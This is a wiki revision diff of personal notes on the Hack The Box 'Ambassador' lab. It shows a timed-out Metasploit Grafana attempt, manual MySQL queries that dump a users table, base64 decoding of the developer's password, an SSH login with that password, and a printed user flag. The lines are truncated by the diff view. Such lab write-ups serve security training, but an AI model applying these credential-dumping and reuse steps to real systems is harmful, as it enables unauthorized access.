ex:htb:ambassador:start
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
ex:htb:ambassador:start [2022/12/22 17:26] – ebaer | ex:htb:ambassador:start [2022/12/22 17:44] (current) – ebaer | ||
---|---|---|---|
Line 314: | Line 314: | ||
msf6 auxiliary(admin/ | msf6 auxiliary(admin/ | ||
username => grafana | username => grafana | ||
+ | msf6 auxiliary(admin/ | ||
+ | ConnectTimeout => 30 | ||
+ | msf6 auxiliary(admin/ | ||
</ | </ | ||
+ | |||
+ | -> Timeout (anti metasploit measures?) | ||
+ | |||
+ | ===== MySQL manual ===== | ||
+ | |||
+ | < | ||
+ | show databases; | ||
+ | use information_schema | ||
+ | select * from tables; | ||
+ | |||
+ | |||
+ | | def | whackywidget | ||
+ | | def | performance_schema | innodb_redo_log_files | ||
+ | +---------------+--------------------+------------------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+--------------------+----------+---------------------------------------+------------------------------------------+ | ||
+ | 329 rows in set (0.325 sec) | ||
+ | |||
+ | MySQL [information_schema]> | ||
+ | Reading table information for completion of table and column names | ||
+ | You can turn off this feature to get a quicker startup with -A | ||
+ | |||
+ | Database changed | ||
+ | MySQL [whackywidget]> | ||
+ | +------------------------+ | ||
+ | | Tables_in_whackywidget | | ||
+ | +------------------------+ | ||
+ | | users | | ||
+ | +------------------------+ | ||
+ | 1 row in set (0.048 sec) | ||
+ | |||
+ | MySQL [whackywidget]> | ||
+ | +-----------+------------------------------------------+ | ||
+ | | user | pass | | ||
+ | +-----------+------------------------------------------+ | ||
+ | | developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== | | ||
+ | +-----------+------------------------------------------+ | ||
+ | 1 row in set (0.047 sec) | ||
+ | |||
+ | </ | ||
+ | |||
+ | < | ||
+ | echo " | ||
+ | anEnglishManInNewYork027468 | ||
+ | |||
+ | </ | ||
+ | |||
+ | |||
+ | < | ||
+ | sh developer@10.129.228.56 | ||
+ | developer@10.129.228.56' | ||
+ | Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64) | ||
+ | |||
+ | [...] | ||
+ | |||
+ | Last login: Fri Sep 2 02:33:30 2022 from 10.10.0.1 | ||
+ | developer@ambassador: | ||
+ | bdff80ba21c478079a3332f785c4ddba | ||
ex/htb/ambassador/start.1671726411.txt.gz · Last modified: 2022/12/22 17:26 by ebaer